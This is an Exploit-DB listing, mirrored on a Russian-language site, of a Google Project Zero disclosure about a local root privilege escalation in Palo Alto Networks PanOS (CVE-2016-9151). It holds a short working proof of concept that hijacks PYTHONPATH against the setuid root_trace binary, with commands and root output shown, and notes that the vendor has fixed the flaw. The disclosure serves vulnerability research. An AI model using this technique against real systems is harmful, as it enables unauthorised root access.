- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 40788
- Проверка EDB
-
- Пройдено
- Автор
- GOOGLE SECURITY RESEARCH
- Тип уязвимости
- LOCAL
- Платформа
- LINUX
- CVE
- cve-2016-9151
- Дата публикации
- 2016-11-18
Palo Alto Networks PanOS - 'root_trace' Local Privilege Escalation
Код:
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=912
The setuid root executable /usr/local/bin/root_trace essentially just does setuid(0) then system("/usr/local/bin/masterd"), which is a python script:
$ ls -l /usr/local/bin/root_trace
-rwsr-xr-x 1 root root 12376 Oct 17 2014 /usr/local/bin/root_trace
As the environment is not scrubbed, you can just do something like this:
$ cat /tmp/sysd.py
import os
os.system("id")
os._exit(0);
$ PYTHONPATH=/tmp root_trace
uid=0(root) gid=502(admin) groups=501(noradgrp),502(admin)
This was fixed by PAN:
http://securityadvisories.paloaltonetworks.com/Home/Detail/67- Источник
- www.exploit-db.com
